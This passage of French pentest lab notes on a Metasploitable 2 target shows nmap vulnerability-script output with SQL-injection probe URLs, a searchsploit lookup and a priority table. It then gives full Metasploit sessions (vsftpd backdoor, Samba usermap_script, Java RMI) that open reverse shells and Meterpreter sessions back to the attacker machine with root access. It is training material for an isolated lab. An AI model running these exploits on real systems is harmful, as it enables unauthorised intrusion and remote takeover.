http://172.16.211.128:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=documentation%2Fvulnerabilities.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?forwardurl=https%3A%2F%2Faddons.mozilla.org%2Fen-US%2Ffirefox%2Fcollections%2Fjdruin%2Fpr%2F\u0026amp;page=redirectandlog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?forwardurl=http%3A%2F%2Fwww.irongeek.com%2F\u0026amp;page=redirectandlog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?forwardurl=http%3A%2F%2Fwww.pocodoy.com%2Fblog%2F\u0026amp;page=redirectandlog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?forwardurl=http%3A%2F%2Fwww.owasp.org\u0026amp;page=redirectandlog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?forwardurl=http%3A%2F%2Fwww.issa-kentuckiana.org%2F\u0026amp;page=redirectandlog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?forwardurl=http%3A%2F%2Fwww.room362.com%2F\u0026amp;page=redirectandlog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?forwardurl=http%3A%2F%2Fpauldotcom.com%2F\u0026amp;page=redirectandlog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?forwardurl=http%3A%2F%2Fwww.isd-podcast.com%2F\u0026amp;page=redirectandlog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?forwardurl=http%3A%2F%2Fwww.php.net%2F\u0026amp;page=redirectandlog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?forwardurl=http%3A%2F%2Fwww.owasp.org%2Findex.php%2FLouisville\u0026amp;page=redirectandlog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=login.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=credits.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?username=anonymous\u0026amp;page=password-generator.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=documentation%2Fvulnerabilities.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=login.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?username=anonymous\u0026amp;page=password-generator.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=credits.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider | Possible sqli for forms: | Form at path: /mutillidae/index.php, form\u0026#39;s action: index.php. Fields that might be vulnerable: | choice | choice | choice | choice | choice | choice | choice | choice | choice | choice | choice | choice |_ initials | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=172.16.211.128 | Found the following possible CSRF vulnerabilities: | | Path: http://172.16.211.128:80/dvwa/ | Form id: | Form action: login.php | | Path: http://172.16.211.128:80/mutillidae/index.php?page=user-poll.php | Form id: idpollform |_ Form action: index.php | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server\u0026#39;s resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ | http-enum: | /tikiwiki/: Tikiwiki | /test/: Test page | /phpinfo.php: Possible information file | /phpMyAdmin/: phpMyAdmin | /doc/: Potentially interesting directory w/ listing on \u0026#39;apache/2.2.8 (ubuntu) dav/2\u0026#39; | /icons/: Potentially interesting folder w/ directory listing |_ /index/: Potentially interesting folder 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec 513/tcp open login 514/tcp open shell 1099/tcp open rmiregistry | rmi-vuln-classloader: | VULNERABLE: | RMI registry default configuration remote code execution vulnerability | State: VULNERABLE | Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution. | | References: |_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb 1524/tcp open ingreslock 2049/tcp open nfs 2121/tcp open ccproxy-ftp 3306/tcp open mysql |_ssl-ccs-injection: No reply from server (TIMEOUT) 5432/tcp open postgresql | ssl-ccs-injection: | VULNERABLE: | SSL/TLS MITM vulnerability (CCS Injection) | State: VULNERABLE | Risk factor: High | OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h | does not properly restrict processing of ChangeCipherSpec messages, | which allows man-in-the-middle attackers to trigger use of a zero | length master key in certain OpenSSL-to-OpenSSL communications, and | consequently hijack sessions or obtain sensitive information, via | a crafted TLS handshake, aka the \u0026#34;CCS Injection\u0026#34; vulnerability. | | References: | http://www.cvedetails.com/cve/2014-0224 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 |_ http://www.openssl.org/news/secadv_20140605.txt | ssl-dh-params: | VULNERABLE: | Diffie-Hellman Key Exchange Insufficient Group Strength | State: VULNERABLE | Transport Layer Security (TLS) services that use Diffie-Hellman groups | of insufficient strength, especially those using one of a few commonly | shared groups, may be susceptible to passive eavesdropping attacks. | Check results: | WEAK DH GROUP 1 | Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA | Modulus Type: Safe prime | Modulus Source: Unknown/Custom-generated | Modulus Length: 1024 | Generator Length: 8 | Public Key Length: 1024 | References: |_ https://weakdh.org | ssl-poodle: | VULNERABLE: | SSL POODLE information leak | State: VULNERABLE | IDs: BID:70574 CVE:CVE-2014-3566 | The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other | products, uses nondeterministic CBC padding, which makes it easier | for man-in-the-middle attackers to obtain cleartext data via a | padding-oracle attack, aka the \u0026#34;POODLE\u0026#34; issue. | Disclosure date: 2014-10-14 | Check results: | TLS_RSA_WITH_AES_128_CBC_SHA | References: | https://www.securityfocus.com/bid/70574 | https://www.imperialviolet.org/2014/10/14/poodle.html | https://www.openssl.org/~bodo/ssl-poodle.pdf |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 5900/tcp open vnc 6000/tcp open X11 6667/tcp open irc |_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277 8009/tcp open ajp13 8180/tcp open unknown | http-cookie-flags: | /admin/: | JSESSIONID: | httponly flag not set | /admin/index.html: | JSESSIONID: | httponly flag not set | /admin/login.html: | JSESSIONID: | httponly flag not set | /admin/admin.html: | JSESSIONID: | httponly flag not set | /admin/account.html: | JSESSIONID: | httponly flag not set | /admin/admin_login.html: | JSESSIONID: | httponly flag not set | /admin/home.html: | JSESSIONID: | httponly flag not set | /admin/admin-login.html: | JSESSIONID: | httponly flag not set | /admin/adminLogin.html: | JSESSIONID: | httponly flag not set | /admin/controlpanel.html: | JSESSIONID: | httponly flag not set | /admin/cp.html: | JSESSIONID: | httponly flag not set | /admin/index.jsp: | JSESSIONID: | httponly flag not set | /admin/login.jsp: | JSESSIONID: | httponly flag not set | /admin/admin.jsp: | JSESSIONID: | httponly flag not set | /admin/home.jsp: | JSESSIONID: | httponly flag not set | /admin/controlpanel.jsp: | JSESSIONID: | httponly flag not set | /admin/admin-login.jsp: | JSESSIONID: | httponly flag not set | /admin/cp.jsp: | JSESSIONID: | httponly flag not set | /admin/account.jsp: | JSESSIONID: | httponly flag not set | /admin/admin_login.jsp: | JSESSIONID: | httponly flag not set | /admin/adminLogin.jsp: | JSESSIONID: | httponly flag not set | /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: | JSESSIONID: | httponly flag not set | /admin/includes/FCKeditor/editor/filemanager/upload/test.html: | JSESSIONID: | httponly flag not set | /admin/jscript/upload.html: | JSESSIONID: |_ httponly flag not set | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server\u0026#39;s resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ | http-enum: | /admin/: Possible admin folder | /admin/index.html: Possible admin folder | /admin/login.html: Possible admin folder | /admin/admin.html: Possible admin folder | /admin/account.html: Possible admin folder | /admin/admin_login.html: Possible admin folder | /admin/home.html: Possible admin folder | /admin/admin-login.html: Possible admin folder | /admin/adminLogin.html: Possible admin folder | /admin/controlpanel.html: Possible admin folder | /admin/cp.html: Possible admin folder | /admin/index.jsp: Possible admin folder | /admin/login.jsp: Possible admin folder | /admin/admin.jsp: Possible admin folder | /admin/home.jsp: Possible admin folder | /admin/controlpanel.jsp: Possible admin folder | /admin/admin-login.jsp: Possible admin folder | /admin/cp.jsp: Possible admin folder | /admin/account.jsp: Possible admin folder | /admin/admin_login.jsp: Possible admin folder | /admin/adminLogin.jsp: Possible admin folder | /manager/html/upload: Apache Tomcat (401 Unauthorized) | /manager/html: Apache Tomcat (401 Unauthorized) | /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload | /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload | /admin/jscript/upload.html: Lizard Cart/Remote File upload |_ /webdav/: Potentially interesting folder MAC Address: 00:0C:29:DE:C8:07 (VMware) Host script results: |_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug) |_smb-vuln-ms10-061: false |_smb-vuln-ms10-054: false Nmap done: 1 IP address (1 host up) scanned in 322.45 seconds Info Extraire les lignes VULNERABLE: ou CVE- pour alimenter le tableau de priorités.\n5. Recherche manuelle hors-ligne avec Searchsploit # Searchsploit permet de faire une recherche\nsoit par version de logiciel searchsploit --title ┌──(kali㉿kali)-[~] └─$ searchsploit --title vsftpd 2.3.4 ------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------- --------------------------------- vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/17491.rb vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py ------------------------------------------- --------------------------------- soit par CVE searchsploit --cve ┌──(kali㉿kali)-[~] └─$ searchsploit --cve CVE-2011-2523 ------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------- --------------------------------- vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/17491.rb vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py ------------------------------------------- --------------------------------- Shellcodes: No Results 6. Recherche en ligne sur exploitdb # Il est possible de consulter les différentes vulnérabilités et exploits correspondants sur https://www.exploit-db.com/\n7. Tableau de priorités (modèle livrable) # Avant de passer à la phase d\u0026rsquo;exploitation :\nRécapituler les éléments identifiés dans un tableau. Prio Service Port Alerte scan (CVE / plugin) Confirmé recon ? Exploit MSF / piste Justification P1 vsFTPd 21 CVE-2011-2523 Oui 2.3.4 vsftpd_234_backdoor RCE facile, démo P1 Samba 445 CVE-2007-2447 Oui usermap_script RCE, souvent root P1 distcc 3632 CVE-2004-2687 Oui distcc_exec RCE root P2 Telnet 23 Weak / default creds Oui msfadmin Accès compte P2 MySQL 3306 Weak password Oui mysql_login Accès BDD P3 HTTP / PHP 80 CGI / anciennes apps Variable php_cgi_arg_injection Vérifier version Joindre le rapport OpenVAS\nJoindre le résultat du scan nmap\n8. Suite de la démarche # Phase actuelle : Scan de vulnérabilités — alertes OpenVAS/Nmap et tableau de priorités consolidé.\n[✓] Mise en place → [✓] Reconnaissance → [✓] Scan vulns → [●] Exploitation → [ ] Post-exploit → [ ] Findings → [ ] Rapport Étape suivante : Exploitation — obtenir 2 à 3 footholds documentés sur MS2.\n","date":"3 June 2026","externalUrl":null,"permalink":"/learning/pentest/metasploitable2/scan-vulns/","section":"Learning","summary":"","title":"Scan vulns","type":"learning"},{"content":" Exploitation - Metasploitable 2 # Choisir 2 à 3 exploits depuis le tableau de priorités (issues du scan). Pour chaque exploit : search, use, show options, check (si disponible) set RHOSTS, LHOST, LPORT, payload adapté run → sessions -l Captures : id, hostname, sortie MSF. Cible lab : 172.16.211.128 · Attaquant : Kali 172.16.211.129 (host-only).\nImportant : Metasploitable 2 est volontairement vulnérable. Exploitation uniquement sur ce lab isolé — pas d’exposition Internet, pas de scan ni d’exploit hors 172.16.211.128 (réseau campus, LAN personnel, etc.).\n1. Où commence l’exploitation ? # Phase Objectif Outils typiques Reconnaissance Identifier les cibles potentielles, et les ports ouverts nmap Scan de vulnérabilités Confirmer CVE / plugins, prioriser OpenVAS, Nessus, nmap --script vuln Exploitation Preuve d’accès : shell, compte, session Metasploit, exploits publics, credentials faibles Post-exploitation Impact, privilèges, preuves complémentaires Meterpreter, commandes locales, enum Rapport Documenter repro + correctifs Fiche finding L’exploitation = utiliser une faiblesse pour franchir un objectif de sécurité (ex. exécuter des commandes sur MS2).\nReconnaissance → Scan vulns → Exploitation (foothold) → Post-exploit minimal → Fiche finding → Rapport 2. Typologie des exploitations # Type Description Exemples MS2 Remote code execution (RCE) Commandes à distance via service réseau vsFTPd backdoor, Samba, UnrealIRCd, distcc Exécution via application web SQLi, RCE web, upload, inclusion Mutillidae, DVWA, TWiki, Tomcat manager Accès par credentials Mot de passe faible / par défaut Telnet, SSH, MySQL, Tomcat, VNC Backdoor / service déjà compromis Port ouvert = shell existant Port 1524 (ingreslock historique) Mauvaise configuration Droits NFS/SMB, X11, SNMP écriture Upload via WebDAV, montage NFS Client-side / logique CSRF, XSS → vol session Mutillidae (plutôt phase web) 3. Exploitations par CVE # 3.1 FTP — port 21 (vsFTPd 2.3.4) # Le scan nmap remonte :\n21/tcp open ftp | ftp-vsftpd-backdoor: | VULNERABLE: | vsFTPd version 2.3.4 backdoor | State: VULNERABLE (Exploitable) | IDs: BID:48539 CVE:CVE-2011-2523 | vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04. | Disclosure date: 2011-07-03 | Exploit results: | Shell command: id | Results: uid=0(root) gid=0(root) | References: | http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523 | https://www.securityfocus.com/bid/48539 |_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb Lancer la console msfconsole et rechercher un exploit pour vsftpd 2.3.4 └─$ msfconsole -q msf \u0026gt; search vsftpd Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/dos/ftp/vsftpd_232 2011-02-03 normal Yes VSFTPD 2.3.2 Denial of Service 1 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent Yes VSFTPD 2.3.4 Backdoor Command Execution Lancer l\u0026rsquo;exploit : en chargeant le module avec use en définissant l\u0026rsquo;adresse source avec set LHOST en définissant l\u0026rsquo;adresse distante (MS2) avec set RHOST puis en lançant l\u0026rsquo;exploit avec run msf \u0026gt; use exploit/unix/ftp/vsftpd_234_backdoor [*] Using configured payload cmd/linux/http/x86/meterpreter_reverse_tcp msf exploit(unix/ftp/vsftpd_234_backdoor) \u0026gt; set LHOST 172.16.211.129 LHOST =\u0026gt; 172.16.211.129 msf exploit(unix/ftp/vsftpd_234_backdoor) \u0026gt; set RHOST 172.16.211.128 RHOST =\u0026gt; 172.16.211.128 msf exploit(unix/ftp/vsftpd_234_backdoor) \u0026gt; run [*] Started reverse TCP handler on 172.16.211.129:4444 [*] 172.16.211.128:21 - Running automatic check (\u0026#34;set AutoCheck false\u0026#34; to disable) [*] 172.16.211.128:21 - FTP banner hints its vulnerable: 220 (vsFTPd 2.3.4) [+] 172.16.211.128:21 - The target appears to be vulnerable. vsftpd 2.3.4 banner detected; backdoor may be present [+] 172.16.211.128:21 - Backdoor has been spawned! [*] Meterpreter session 1 opened (172.16.211.129:4444 -\u0026gt; 172.16.211.128:45664) at 2026-06-11 15:54:30 -0400 Lancer la collecte des preuves avec par exemple getuid, et sysinfo meterpreter \u0026gt; getuid Server username: root meterpreter \u0026gt; sysinfo Computer : metasploitable.localdomain OS : Ubuntu 8.04 (Linux 2.6.24-16-server) Architecture : i686 BuildTuple : i486-linux-musl Meterpreter : x86/linux 3.2 Samba / SMB — port 445 # Nmap ne nous donne pas beaucoup de détails\n445/tcp open microsoft-ds Cependant, enum4linux 172.16.211.128 donne plus d\u0026rsquo;informations, notamment\n==================================( OS information on 172.16.211.128 )================================== [E] Can\u0026#39;t get OS info with smbclient [+] Got OS info for 172.16.211.128 from srvinfo: METASPLOITABLE Wk Sv PrQ Unx NT SNT metasploitable server (Samba 3.0.20-Debian) platform_id : 500 os version : 4.9 server type : 0x9a03 Lancer la console msfconsole et rechercher un exploit pour Samba 3.0.20 └─$ msfconsole -q msf \u0026gt; search Samba 3.0.20 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba \u0026#34;username map script\u0026#34; Command Execution Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script Lancer l\u0026rsquo;exploit : en chargeant le module avec use en définissant l\u0026rsquo;adresse source avec set LHOST en définissant l\u0026rsquo;adresse distante (MS2) avec set RHOST puis en lançant l\u0026rsquo;exploit avec run msf \u0026gt; use exploit/multi/samba/usermap_script [*] No payload configured, defaulting to cmd/unix/reverse_netcat msf exploit(multi/samba/usermap_script) \u0026gt; set LHOST 172.16.211.129 LHOST =\u0026gt; 172.16.211.129 msf exploit(multi/samba/usermap_script) \u0026gt; set RHOST 172.16.211.128 RHOST =\u0026gt; 172.16.211.128 msf exploit(multi/samba/usermap_script) \u0026gt; run [*] Started reverse TCP handler on 172.16.211.129:4444 [*] Command shell session 1 opened (172.16.211.129:4444 -\u0026gt; 172.16.211.128:54142) at 2026-06-11 16:52:14 -0400 Lancer la collecte des preuves avec par exemple hostname, et whoami hostname metasploitable whoami root 4. Mauvaise configuration # 4.1 Java RMI # Le scan nmap précédent remonte :\n1099/tcp open rmiregistry | rmi-vuln-classloader: | VULNERABLE: | RMI registry default configuration remote code execution vulnerability | State: VULNERABLE | Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution. | | References: |_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb Lancer la console msfconsole et rechercher un exploit pour java rmi └─$ msfconsole -q msf \u0026gt; search java rmi Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce 2019-05-22 excellent Yes Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE 1 exploit/multi/http/crushftp_rce_cve_2023_43177 2023-08-08 excellent Yes CrushFTP Unauthenticated RCE 2 \\_ target: Java . . . . 3 \\_ target: Linux Dropper . . . . 4 \\_ target: Windows Dropper . . . . 5 exploit/multi/misc/java_jmx_server 2013-05-22 excellent Yes Java JMX Server Insecure Configuration Java Code Execution 6 auxiliary/scanner/misc/java_jmx_server 2013-05-22 normal No Java JMX Server Insecure Endpoint Code Execution Scanner 7 auxiliary/gather/java_rmi_registry . normal No Java RMI Registry Interfaces Enumeration 8 exploit/multi/misc/java_rmi_server 2011-10-15 excellent Yes Java RMI Server Insecure Default Configuration Java Code Execution 9 \\_ target: Generic (Java Payload) . . . . 10 \\_ target: Windows x86 (Native Payload) . . . . 11 \\_ target: Linux x86 (Native Payload) . . . . 12 \\_ target: Mac OS X PPC (Native Payload) . . . . 13 \\_ target: Mac OS X x86 (Native Payload) . . . . 14 auxiliary/scanner/misc/java_rmi_server 2011-10-15 normal No Java RMI Server Insecure Endpoint Code Execution Scanner 15 exploit/multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Privilege Escalation 16 exploit/multi/browser/java_signed_applet 1997-02-19 excellent No Java Signed Applet Social Engineering Code Execution 17 \\_ target: Generic (Java Payload) . . . . 18 \\_ target: Windows x86 (Native Payload) . . . . 19 \\_ target: Linux x86 (Native Payload) . . . . 20 \\_ target: Mac OS X PPC (Native Payload) . . . . 21 \\_ target: Mac OS X x86 (Native Payload) . . . . 22 exploit/multi/http/jenkins_metaprogramming 2019-01-08 excellent Yes Jenkins ACL Bypass and Metaprogramming RCE 23 \\_ target: Unix In-Memory . . . . 24 \\_ target: Java Dropper . . . . 25 exploit/linux/misc/jenkins_java_deserialize 2015-11-18 excellent Yes Jenkins CLI RMI Java Deserialization Vulnerability 26 exploit/linux/http/kibana_timelion_prototype_pollution_rce 2019-10-30 manual Yes Kibana Timelion Prototype Pollution RCE 27 exploit/multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 excellent No Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution 28 \\_ target: Universal (Javascript XPCOM Shell) . . . . 29 \\_ target: Native Payload . . . . 30 exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315 2023-05-26 excellent Yes Openfire authentication bypass with RCE plugin 31 exploit/multi/http/torchserver_cve_2023_43654 2023-10-03 excellent Yes PyTorch Model Server Registration and Deserialization RCE 32 exploit/multi/http/totaljs_cms_widget_exec 2019-08-30 excellent Yes Total.js CMS 12 Widget JavaScript Code Injection 33 \\_ target: Total.js CMS on Linux . . . . 34 \\_ target: Total.js CMS on Mac . . . . 35 exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc 2021-09-21 manual Yes VMware vCenter vScalation Priv Esc 36 exploit/multi/misc/vscode_ipynb_remote_dev_exec 2022-11-22 excellent Yes VSCode ipynb Remote Development RCE 37 \\_ target: Windows . . . . 38 \\_ target: Linux File-Dropper . . . . Interact with a module by name or index. For example info 38, use 38 or use exploit/multi/misc/vscode_ipynb_remote_dev_exec After interacting with a module you can manually set a TARGET with set TARGET \u0026#39;Linux File-Dropper\u0026#39; Lancer l\u0026rsquo;exploit : en chargeant le module avec use en définissant l\u0026rsquo;adresse source avec set LHOST en définissant l\u0026rsquo;adresse distante (MS2) avec set RHOST puis en lançant l\u0026rsquo;exploit avec run msf \u0026gt; use exploit/multi/misc/java_rmi_server [*] No payload configured, defaulting to java/meterpreter/reverse_tcp msf exploit(multi/misc/java_rmi_server) \u0026gt; set LHOST 172.16.211.129 LHOST =\u0026gt; 172.16.211.129 msf exploit(multi/misc/java_rmi_server) \u0026gt; set RHOST 172.16.211.128 RHOST =\u0026gt; 172.16.211.128 msf exploit(multi/misc/java_rmi_server) \u0026gt; run [*] Started reverse TCP handler on 172.16.211.129:4444 [*] 172.16.211.128:1099 - Using URL: http://172.16.211.129:8080/1WZ1it7g4l8 [*] 172.16.211.128:1099 - Server started. [*] 172.16.211.128:1099 - Sending RMI Header... [*] 172.16.211.128:1099 - Sending RMI Call... [*] 172.16.211.128:1099 - Replied to request for payload JAR [*] Sending stage (58073 bytes) to 172.16.211.128 [*] Meterpreter session 1 opened (172.16.211.129:4444 -\u0026gt; 172.16.211.128:52626) at 2026-06-11 16:19:44 -0400 4.2 VNC # Le scan nmap remonte :\n5900/tcp open vnc Le port VNC étant ouvert, tenter un scan.\nCharger le scanner pour VNC dans la console msf └─$ msfconsole -q msf \u0026gt; use auxiliary/scanner/vnc/vnc_login msf auxiliary(scanner/vnc/vnc_login) \u0026gt; set RHOST 172.16.211.128 RHOST =\u0026gt; 172.16.211.128 msf auxiliary(scanner/vnc/vnc_login) \u0026gt; set LHOST 